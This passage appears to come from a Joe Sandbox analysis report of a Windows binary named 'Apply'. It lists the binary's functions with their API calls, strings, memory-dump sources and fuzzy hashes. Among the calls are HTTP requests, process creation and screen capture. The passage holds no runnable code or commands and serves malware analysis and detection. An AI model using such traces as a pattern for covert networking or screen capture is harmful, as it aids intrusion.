                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 008D05C4
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 008D05CF
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 008D05DA
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 008D05E5
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 008D05F0
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 008D05FB
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 008D0606
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 008D0611
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 008D061C
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 008D0627
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 008D0632
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 008D063D
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 008D0648
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 008D0653
                                                    • GetCursorInfo.USER32(?), ref: 008D0663
                                                    • GetLastError.KERNEL32 ref: 008D06A5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: 961de8921c5a67d74800f6e91b5567a3dfbf69b8ee2aef85bf53a9b895853115
                                                    • Instruction ID: ff3d0c85fce8ff6eeda4ab9ed6facc43578bd5c6b9a698033573c7bbf015400f
                                                    • Opcode Fuzzy Hash: 961de8921c5a67d74800f6e91b5567a3dfbf69b8ee2aef85bf53a9b895853115
                                                    • Instruction Fuzzy Hash: 644183B0D083196ADB10DFBA9C8995EBFE8FF44354B50462AE11CEB281DA78D801CF91
                                                    APIs
                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00870416
                                                      • Part of subcall function 0087043D: InitializeCriticalSectionAndSpinCount.KERNEL32(009216FC,00000FA0,AD6ACC9F,?,?,?,?,00892703,000000FF), ref: 0087046C
                                                      • Part of subcall function 0087043D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00892703,000000FF), ref: 00870477
                                                      • Part of subcall function 0087043D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00892703,000000FF), ref: 00870488
                                                      • Part of subcall function 0087043D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0087049E
                                                      • Part of subcall function 0087043D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008704AC
                                                      • Part of subcall function 0087043D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008704BA
                                                      • Part of subcall function 0087043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008704E5
                                                      • Part of subcall function 0087043D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008704F0
                                                    • ___scrt_fastfail.LIBCMT ref: 00870437
                                                      • Part of subcall function 008703F3: __onexit.LIBCMT ref: 008703F9
                                                    Strings
                                                    • kernel32.dll, xrefs: 00870483
                                                    • WakeAllConditionVariable, xrefs: 008704B2
                                                    • InitializeConditionVariable, xrefs: 00870498
                                                    • SleepConditionVariableCS, xrefs: 008704A4
                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00870472
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 66158676-1714406822
                                                    • Opcode ID: bf124ec40d0e88bb49e4e56ca6a7b3400316663675f4516b347d517818edaee3
                                                    • Instruction ID: a4c41216998201599ef9376926fe2330e6799ea8738055d2deb6bff6fae8ec87
                                                    • Opcode Fuzzy Hash: bf124ec40d0e88bb49e4e56ca6a7b3400316663675f4516b347d517818edaee3
                                                    • Instruction Fuzzy Hash: 7C213B32A44314EFD7112BB8AC45B6A7798FB44F65F048129FA09EA389DF74D8008EA5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 176396367-1603158881
                                                    • Opcode ID: cdff8222f2dae437e534011869cdef4811c0b1d4cb2914caef0e37508d148e5e
                                                    • Instruction ID: 13dc67f99078e4d07de944f8d1ff02ed4abb675270b654312ca763cd23849cc1
                                                    • Opcode Fuzzy Hash: cdff8222f2dae437e534011869cdef4811c0b1d4cb2914caef0e37508d148e5e
                                                    • Instruction Fuzzy Hash: 10E1B431A0452AABCB28DFA8C4916EDFBB4FF14714F548129E856E7350DB30AE89C790
                                                    APIs
                                                    • CharLowerBuffW.USER32(00000000,00000000,008EDC1C), ref: 008C4C96
                                                    • _wcslen.LIBCMT ref: 008C4CAA
                                                    • _wcslen.LIBCMT ref: 008C4D08
                                                    • _wcslen.LIBCMT ref: 008C4D63
                                                    • _wcslen.LIBCMT ref: 008C4DAE
                                                    • _wcslen.LIBCMT ref: 008C4E16
                                                      • Part of subcall function 0086FD18: _wcslen.LIBCMT ref: 0086FD23
                                                    • GetDriveTypeW.KERNEL32(?,00917C00,00000061), ref: 008C4EB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2055661098-1000479233
                                                    • Opcode ID: f8a551e931d17e7a0ce614970f3c3fe29069717dc6d8671529085369f384c355
                                                    • Instruction ID: 33b441a58ad60521eab5bf5695a4626bb2f1e1075f2a9e2449959fe61fc16624
                                                    • Opcode Fuzzy Hash: f8a551e931d17e7a0ce614970f3c3fe29069717dc6d8671529085369f384c355
                                                    • Instruction Fuzzy Hash: CBB1B1316083029FC710EF28D9A0E6AB7F5FFA4724F50591DF996C7295DB30D889CA92
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 008DB91F
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008DB937
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008DB95B
                                                    • _wcslen.LIBCMT ref: 008DB987
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008DB99B
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008DB9BD
                                                    • _wcslen.LIBCMT ref: 008DBAB9
                                                      • Part of subcall function 008C0C78: GetStdHandle.KERNEL32(000000F6), ref: 008C0C97
                                                    • _wcslen.LIBCMT ref: 008DBAD2
                                                    • _wcslen.LIBCMT ref: 008DBAED
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008DBB3D
                                                    • GetLastError.KERNEL32(00000000), ref: 008DBB8E
                                                    • CloseHandle.KERNEL32(?), ref: 008DBBC0
                                                    • CloseHandle.KERNEL32(00000000), ref: 008DBBD1
                                                    • CloseHandle.KERNEL32(00000000), ref: 008DBBE3
                                                    • CloseHandle.KERNEL32(00000000), ref: 008DBBF5
                                                    • CloseHandle.KERNEL32(?), ref: 008DBC6A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 2178637699-0
                                                    • Opcode ID: fb485b159c7b9e3843c94c6fa0197932a8bf5acc35ad22f4b9fb37225542ff83
                                                    • Instruction ID: 734344e57ed8e3d86b8950065f9b870dc0ac9feff492992740da0564fd075ae5
                                                    • Opcode Fuzzy Hash: fb485b159c7b9e3843c94c6fa0197932a8bf5acc35ad22f4b9fb37225542ff83
                                                    • Instruction Fuzzy Hash: 39F16671504340DFCB15EF28C891A6ABBE5FF85354F19865EE8898B3A2DB30EC45CB52
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,008EDC1C), ref: 008D4842
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008D4854
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,008EDC1C), ref: 008D4879
                                                    • FreeLibrary.KERNEL32(00000000,?,008EDC1C), ref: 008D48C5
                                                    • StringFromGUID2.OLE32(?,?,00000028,?,008EDC1C), ref: 008D492F
                                                    • SysFreeString.OLEAUT32(00000009), ref: 008D49E9
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008D4A4F
                                                    • SysFreeString.OLEAUT32(?), ref: 008D4A79
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 354098117-199464113
                                                    • Opcode ID: 281ea0689fa7f05dab491ee10cfe6f891dc39914ee38b45ab3fe0eeb9fb734e9
                                                    • Instruction ID: f2bc0c24c06e3b4a904742883cf4a850381845656b99500fb90dab8a4d08060a
                                                    • Opcode Fuzzy Hash: 281ea0689fa7f05dab491ee10cfe6f891dc39914ee38b45ab3fe0eeb9fb734e9
                                                    • Instruction Fuzzy Hash: 26122B71A00219EFDB14DF94C884EAEBBB5FF45318F249199E805EB261D731ED46CBA0
                                                    APIs
                                                    • GetMenuItemCount.USER32(009229B0), ref: 00893202
                                                    • GetMenuItemCount.USER32(009229B0), ref: 008932B2
                                                    • GetCursorPos.USER32(?), ref: 008932F6
                                                    • SetForegroundWindow.USER32(00000000), ref: 008932FF
                                                    • TrackPopupMenuEx.USER32(009229B0,00000000,?,00000000,00000000,00000000), ref: 00893312
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0089331E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                    • String ID: 0
                                                    • API String ID: 36266755-4108050209
                                                    • Opcode ID: d2f3496ce09509bef81fd4cd1fa129bb2a28c48807e28b26b734273a408afc84
                                                    • Instruction ID: 959f3f4fdd0c6f75ffba440fd3aef9b346c935cb386f6988b2709f81c45f2405
                                                    • Opcode Fuzzy Hash: d2f3496ce09509bef81fd4cd1fa129bb2a28c48807e28b26b734273a408afc84
                                                    • Instruction Fuzzy Hash: 06711730640315BFEB219F68CC49FAABF64FF05364F184216F914EA2E1C7B16918D791
                                                    APIs
                                                    • DestroyWindow.USER32(00000000,?), ref: 008E74B6
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008E752A
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008E754C
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008E755F
                                                    • DestroyWindow.USER32(?), ref: 008E7580
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00850000,00000000), ref: 008E75AF
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008E75C8
                                                    • GetDesktopWindow.USER32 ref: 008E75E1
                                                    • GetWindowRect.USER32(00000000), ref: 008E75E8
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008E7600
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008E7618
                                                      • Part of subcall function 00869B74: GetWindowLongW.USER32(?,000000EB), ref: 00869B82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 2429346358-3619404913
                                                    • Opcode ID: 4544d9ba3d23cd70c8ad670c840eb3e0876897c78454233e2c3fe33e354e7343
                                                    • Instruction ID: dabb273aefaa3468290213bad9c651e7ff1fbb156d58d2c53b649a9377bd7bd2
                                                    • Opcode Fuzzy Hash: 4544d9ba3d23cd70c8ad670c840eb3e0876897c78454233e2c3fe33e354e7343
                                                    • Instruction Fuzzy Hash: 5E716C74508384AFD725DF59CC48FAABBE9FB9A304F04091DF985CB261C770A946DB11
                                                    APIs
                                                      • Part of subcall function 00869DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00869DE2
                                                    • DragQueryPoint.SHELL32(?,?), ref: 008E9833
                                                      • Part of subcall function 008E7D3F: ClientToScreen.USER32(?,?), ref: 008E7D65
                                                      • Part of subcall function 008E7D3F: GetWindowRect.USER32(?,?), ref: 008E7DDB
                                                      • Part of subcall function 008E7D3F: PtInRect.USER32(?,?,008E9275), ref: 008E7DEB
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 008E989C
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008E98A7
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008E98CA
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 008E9911
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 008E992A
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 008E9941
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 008E9963
                                                    • DragFinish.SHELL32(?), ref: 008E996A
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008E9A5D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 221274066-3440237614
                                                    • Opcode ID: c51867b2173402fa9719c32ec2abb7ab82dfe1c60d99c9b86a128b8342d35a94
                                                    • Instruction ID: 099a535e8d36f9ed73d51520aaf4a7b95fea79e86c054f92637f748e9959a5f7
                                                    • Opcode Fuzzy Hash: c51867b2173402fa9719c32ec2abb7ab82dfe1c60d99c9b86a128b8342d35a94
                                                    • Instruction Fuzzy Hash: 3B616971108345AFC705EF64DC85D9FBBE8FF89314F000A2EF991962A1DB70AA49CB52
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008CCC1F
                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008CCC32
                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008CCC46
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008CCC5F
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 008CCCA2
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008CCCB8
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008CCCC3
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008CCCF3
                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008CCD4B
                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008CCD5F
                                                    • InternetCloseHandle.WININET(00000000), ref: 008CCD6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                    • String ID:
                                                    • API String ID: 3800310941-3916222277
                                                    • Opcode ID: f73489c4eabd43ea4e5fe3d1d9628224774762c5f753d89654dd5f6938fe83a3
                                                    • Instruction ID: 8473f1596e435841abe9e9e808fd4dec136a3abc4f433366c43272df0d11c72d
                                                    • Opcode Fuzzy Hash: f73489c4eabd43ea4e5fe3d1d9628224774762c5f753d89654dd5f6938fe83a3
                                                    • Instruction Fuzzy Hash: B4510AB1500748BFDB219F65CD88FAA7BB8FB04754F00842DFA4ADA250D735E9489BA1
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,008E63F7,?,?), ref: 008E8C7E
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8C8E
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8C99
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CA6
                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CB4
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CC3
                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CCC
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CD3
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008E63F7,?,?,00000000,?), ref: 008E8CE4
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,008F0C20,?), ref: 008E8CFD
                                                    • GlobalFree.KERNEL32(00000000), ref: 008E8D0D
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 008E8D2D
                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 008E8D5D
                                                    • DeleteObject.GDI32(00000000), ref: 008E8D85
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008E8D9B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: 66e6b8d610233f7b6942f87786a57f54812f6f8348df6ec6c4aeeaa2a199165f
                                                    • Instruction ID: 26d58ebcd62b78055d7ef3de16e1f72d57d235aa588bc991e7922e8af0237eb9
                                                    • Opcode Fuzzy Hash: 66e6b8d610233f7b6942f87786a57f54812f6f8348df6ec6c4aeeaa2a199165f
                                                    • Instruction Fuzzy Hash: F2411C75600248FFDB119F65DC88EAEBBB9FF8A711F104059F919DB2A0DB70A945CB20
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 008D2D5F
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008D2D6F
                                                    • CreateCompatibleDC.GDI32(?), ref: 008D2D7B
                                                    • SelectObject.GDI32(00000000,?), ref: 008D2D88
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 008D2DF4
                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008D2E33
                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008D2E57
                                                    • SelectObject.GDI32(?,?), ref: 008D2E5F
                                                    • DeleteObject.GDI32(?), ref: 008D2E68
                                                    • DeleteDC.GDI32(?), ref: 008D2E6F
                                                    • ReleaseDC.USER32(00000000,?), ref: 008D2E7A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: ca6322e43fd2b57248e6ca35f45490ca50b8b6831f2fa08001a12e8203c93663
                                                    • Instruction ID: 9704812efd125569a516d6de3edfa3d226bded285c4b482c6aadc40bc3aa6bb8
                                                    • Opcode Fuzzy Hash: ca6322e43fd2b57248e6ca35f45490ca50b8b6831f2fa08001a12e8203c93663
                                                    • Instruction Fuzzy Hash: B161D475D00219EFCF04CFA8D884AAEBBB6FF58310F20851AE555EB250D770A941DF60
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 008B507B
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 008B50BD
                                                    • _wcslen.LIBCMT ref: 008B50CE
